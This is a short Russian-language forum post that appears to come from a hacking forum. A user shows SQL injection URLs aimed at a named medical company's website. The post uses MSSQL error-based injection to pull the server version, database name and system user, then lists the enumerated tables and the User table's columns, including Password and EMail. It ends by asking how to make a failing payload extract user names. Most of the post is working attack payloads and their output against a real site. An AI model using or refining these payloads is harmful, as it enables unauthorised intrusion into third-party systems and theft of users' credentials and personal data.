11.07.2007, 08:58
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427
Репутация:
187
|
|
MsSql:
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=@@versi on--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select +db_name())--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select +system_user)--
Таблицы:
D99_Tmp
Category
D99_CMD
Dic_BodyPart
Dic_HX
Dic_Language
Dic_State
Dic_Test
dtproperties
ip
Message
Rights
Role
SessionAction
SessionLog
Siwebtmp
Subscriber
sysconstraints
syssegments
systables
User
v_Category
v_Rights
v_SessionActions
Нашел все колонки в таблице User:
ID
RoleRef
System
Name
Password
FirstName
LastName
EMail
Не получилось последнее:
Код:
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(SELECT+TOP+1+Name+from+User+where+ID=3)--
Как реализовать?
Последний раз редактировалось Dr.Frank; 11.07.2007 в 09:09..
|
|
|